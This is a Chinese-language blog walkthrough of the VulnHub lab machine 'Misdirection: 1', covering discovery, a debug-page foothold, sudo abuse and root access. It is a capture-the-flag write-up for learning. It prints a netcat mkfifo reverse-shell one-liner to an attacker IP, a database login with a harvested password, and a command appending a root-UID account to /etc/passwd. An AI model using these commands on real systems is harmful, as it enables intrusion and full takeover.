靶机Misdirection: 1 ~ VulnHub

Misdirection: 1 ~ VulnHub

下载链接见:

https://download.vulnhub.com/misdirection/Misdirection.zip

这里我们需要看

image-20250616124939956

首先我们使用arp-scan对内网主机进行发现

image-20250617123355144

随后对靶机进行端口扫描,有一个22端口ssh协议,80端口开启了http协议,还有3306的mysql数据库端口,8080也是http协议

image-20250617123442465

访问80端口,并从wappalyzer信息收集插件看到这个cms是Drupal

image-20250617124100219

随后点击进入到这个界面,告诉我们说这个系统是开源的,并且有源代码,还有一个下载选项

image-20250617124449450

登录框尝试万能密码,却限制了我们只能使用邮箱登录,随后我们尝试注册一个用户

image-20250617130638298

却提示了一个信息,无法发送电子邮件

image-20250617130700310

随后这里有一个Source Code源码,

image-20250617131120310

查看这个作者的源码中包含了一个admin,(其他代码信息没啥利用价值)

image-20250617131208800

尝试访问却提示管理因不安全通道而关闭

image-20250617131242522

突然发现我们目录扫描还没扫呢,通过扫描结果也能看到目标站点设置了防目录扫描功能

image-20250617131455363

切换思路,我们来到8080端口,意外的发现这是一个wordpress的内容管理系统

image-20250617130411320

按照常规的方式,首先是后台的爆破 http://10.10.10.129:8080/wordpress/wp-admin

image-20250617154748986

但是呢它重定向到了另一个页面,而且这个页面并不是在当前的这个界面

当我利用dirb进行目录扫描的时候呢,不扫wordpress这个命令,有一个debug发现了新的突破口

image-20250617190516322

当我想要创建一个交互式的终端的时候呢,发现使用su命令并不能正常的使用

python3 -c 'import pty;pty.spawn("/bin/bash")'

image-20250617190835117

只能被迫使用nc进行反弹shell,反弹成功后就能利用su命令切换用户啦

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.10.128 1234 >/tmp/f

image-20250617191031785

接下来就是信息收集,一条龙下来就可,也可以使用自定义脚本

学习文章参考:近400个渗透测试常用命令,信息收集、web、内网、隐藏通信、域渗透等等

image-20250618172433134

全部获取完成后,你会发现几个关键的点,sudo 可以利用,有一个/bin/bash,但是需要brexit用户才能用奥

image-20250618172536807

还有个思路就是前端有wordpress,那么必定和数据库有交互,我们来看配置文件,能看到密码

image-20250618175156298

找到了第一个和密码相关的,那么这个密码是不是root用户的密码呢?很明显,不会让你这么轻易获得root权限的

image-20250618175251841

登录数据库

mysql -ublog -pabcdefghijklmnopqrstuv

找用户表

image-20250618175641283

破解失败了,不过不要紧

image-20250618175558928

我们继续回到那个sudo,他说了要求brexit用户才能执行那个/bin/bash,那么久指定一个用户吧

sudo -u brexit /bin/bash

image-20250618180722304

相当的棒,提权成功,经过一番折磨后,该收集的信息都收集了,直到我翻到.viminfo,看到了用户编辑过/etc/passwd,这个文件主要记录了一些vim的编辑历史

image-20250618181315742

查看权限,这下不就有思路啦(那么多信息收集命令,既然少了这么重要的东西。。。。。。赶紧补上)

image-20250618181650474

然后我们仿照/etc/passwd的格式生成一个账号 baibaixiaoyu 和密码123456,将这个用户分到root组下

echo 'baibaixiaoyu:$1$oFd2MoKR$eVjr6Fe7JWwjAPEfaTQSy.:0:0:root:/root:/bin/bash' >> /etc/passwd

image-20250618182321880

至此渗透结束

往期推荐

红日靶场3,joomla渗透,海德拉SMB爆破,域内5台主机横向移动教学

Linux 32位Crossfire游戏缓冲区溢出

独立开发零显卡AI引擎!媲美DeepSeek,附源码

【oscp】Tr0ll 靶机全系列(1-3),FTP被玩坏了

神器分享 红队快速打点工具-DarKnuclei

从零开始学SQL注入(sql十大注入类型):技术解析与实战演练

【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏

【渗透测试】12种rbash逃逸方式总结

利用MySQL特性,WAF绕过技巧

SQL注入绕过某狗的waf防火墙,这一篇就够了,6k文案超详细

 

本站内容部分转载于互联网,并不代表本站立场!如若本站内容侵犯了原著者的合法权益,可联系我们进行处理! 拒绝任何人以任何形式在本站发表与中华人民共和国法律相抵触的言论!
THE END
喜欢就支持一下吧
点赞11 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片快捷回复

    暂无评论内容